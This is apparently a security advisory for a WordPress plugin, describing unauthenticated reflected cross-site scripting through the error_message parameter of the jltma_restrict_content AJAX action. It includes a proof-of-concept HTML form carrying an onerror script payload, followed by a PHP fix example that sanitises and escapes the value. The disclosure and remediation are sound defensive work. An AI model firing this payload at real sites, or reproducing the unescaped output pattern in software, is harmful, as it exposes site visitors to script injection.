The plugin does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, which is available to both unauthenticated and authenticated users, leading to Reflected Cross-Site Scripting.
<html>
<form action="https://example.com/wp-admin/admin-ajax.php?action=jltma_restrict_content" method="POST">
<input type="text" value="ma_el_rc_answer=x" name="fields">
<input type="text" value="math_captcha" name="restrict_type">
<input type="text" value="<img src onerror=alert(`XSS`)>" name="error_message">
<input type="submit" value="Send">
</form>
</html>
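The fix described above, sanitising the parameter on input and escaping it on output, sketched as an added example that is not the plugin's own code. Only the action name and the error_message parameter come from the advisory; the function names, CSS class, text domain, default message and the shape of the vulnerable line are assumptions.

```php
<?php
// Added example: hypothetical handler, not the plugin's actual source.

// Vulnerable pattern (assumed shape of the flaw the advisory describes):
//   echo '<div class="example-rc-error">' . $_POST['error_message'] . '</div>';

/**
 * Return a plain-text error message taken from the request, or a fixed
 * default when the parameter is missing, not a string, or empty after cleaning.
 */
function example_rc_error_message() {
    $default = __( 'Incorrect answer, please try again.', 'example-textdomain' );

    // Reject error_message[]=... style input instead of passing an array on.
    if ( ! isset( $_POST['error_message'] ) || ! is_string( $_POST['error_message'] ) ) {
        return $default;
    }

    // Sanitise on input: wp_unslash() undoes WordPress's added slashes,
    // sanitize_text_field() strips tags (such as the PoC's <img ...>),
    // line breaks and invalid UTF-8.
    $message = sanitize_text_field( wp_unslash( $_POST['error_message'] ) );

    return '' === $message ? $default : $message;
}

function example_rc_handler() {
    // The restriction check itself is out of scope here; this shows only
    // the branch that reflects the message back to the client.

    // Escape on output for the HTML text context, even though the value was
    // already sanitised: the two steps protect against different mistakes.
    printf(
        '<div class="example-rc-error">%s</div>',
        esc_html( example_rc_error_message() )
    );

    wp_die(); // End the AJAX request without the trailing "0" output.
}

// The advisory states the action is reachable with and without a login,
// which corresponds to registering both hooks.
add_action( 'wp_ajax_jltma_restrict_content', 'example_rc_handler' );
add_action( 'wp_ajax_nopriv_jltma_restrict_content', 'example_rc_handler' );
```

If the message is placed in an HTML attribute rather than element content, esc_attr() is the matching escaping function.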